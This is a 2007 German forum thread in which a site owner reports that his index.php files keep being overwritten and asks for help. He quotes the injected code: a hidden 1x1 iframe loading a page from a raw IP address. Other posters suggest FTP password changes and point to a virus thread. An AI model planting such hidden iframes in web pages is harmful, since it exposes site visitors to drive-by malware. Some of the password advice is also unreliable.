index.php und adminforce/index.php

**valkox** · 22.05.2007, 18:05

Hallo

Währe klasse wenn mir irgend jemand mal helfen könnte,

Schon eine ganze weile, überschreibt jemand meine Index.php mit einem iframe code
und das in der untersten zeile.

Das passiert im hauptordner mit index.php und adminforce/index.php

Wenn der iframe code wieder erscheint, werde ich den mal posten

vielleicht hat auch jemand eine Idee wie ich das überschreiben von Dateien auf dem server unterbinden kann.

Danke schon mal

**EarlofMidnight** · 22.05.2007, 18:37

Mal versucht die FTP Passwörter zu ändern, sonst gibt es kaum möglichkeiten Dateien zu überschreiben.

Gruß

EarlofMidnight

**valkox** · 22.05.2007, 20:02

die hab ich nun schon zweimal geändert und erraten ist bei
PW mit 13 Stellen kaum möglich

Selbst im Ftp Programm, steht ein zugriff auf die dateien,
Datum und Uhrzeit.

Aber genau da bin ich auf der Arbeit.

**EarlofMidnight** · 22.05.2007, 20:54

Wird die IP geloggt?
Erfolgt der Zugriff über FTP?

**valkox** · 22.05.2007, 22:07

Nein die Ip wird leider nicht geloggt,

Ob es über FTP ist kann ich dir nicht sagen.

Wenn du mir sagen kannst wie und wo ich das ablesen kann
währe ich dir sehr verbunden.

**valkox** · 22.05.2007, 22:22

So ich lasse jetzt den server 24STD überwachen um zugriffe und IP zu Protikolieren.

Wenn Irgend jemand über FTP zugreift, werd ich das sehen.

Wenn nicht, ist es ein script Problem.

**swinxx** · 23.05.2007, 11:47

Hmm, das dein PW 13 Stellen hat heisst nicht unbeding das es sicher ist !! 13 Stellen sind auch nciht unbeding viel, ab 40 oder 50 Stellen seh ich das als viel an !

Lasse dir Passwörter von Programmen wie Keypass usw. erstellen und speichere siese dann ab. Wenn das Script das erlaubt am besten auch Sonderzeichen nehmen ( §$%& usw ) die werden von PW Crackprogrammen als letztes durchforstet...

cu, Swinxx

**valkox** · 23.05.2007, 17:03

Danke Swinxx

aberich bin sicher, das es sicher ist, es ist mit sonderzeichen und groß klein schreibung.

Allerdings wundere ich mich richtig schwer.

5 Dateien wurden überschrieben und hinzugefügt und das nicht von mir

adminforce/index.php (überschrieben)
index.php (überschrieben)
lib/index.htm (hinzugefügt)
lib/schittstellen/index.htm (hinzugefügt)
lib/texte/index.htm (hinzugefügt)

dies stand in der index.htm von lib/schitstellen/index.htm

*edit

mal gelöscht,sonst kommt noch jemand auf dumme Ideen

dieser ist der Iframe code

Code:

<iframe src='http://81.95.149.27/logo/index.php' width='1' height='1' style='visibility: hidden;'></iframe>

Eines kann ich definitif sagen, es wurde von gestern abend bis jetzt keine FTP verbindung auf gebaut, das hätte ich nun gesehen, es überschreibt einer die Daten aber ichw eis nicht wo der Fehler liegt.

**EarlofMidnight** · 23.05.2007, 17:44

Hab grad was zu der IP gefunden: http://www.abakus-internet-marketing.../p-356627.html

Bist anscheinend nicht der einzigste der netten Besuch hatte.

Gruß
EarlofMidnight

P.s. les dir den Thread mal genz durch, da geht es um nen Virus

**swinxx** · 23.05.2007, 17:54

Na toll, sind wohl wieder mal einige nette Leute im Netz unterwegs !

cu, swinxx

Thema: index.php und adminforce/index.php

Themen-Optionen

Anzeige

index.php und adminforce/index.php

Ähnliche Themen

Warning: mysql_fetch_array() in der Index & Adminforce

Notice: Undefined index: check in /var/www/web36/html/adminforce/index.php on line 5

Index Hilfe

eintrag in der index.php

Fehler in der Index

Berechtigungen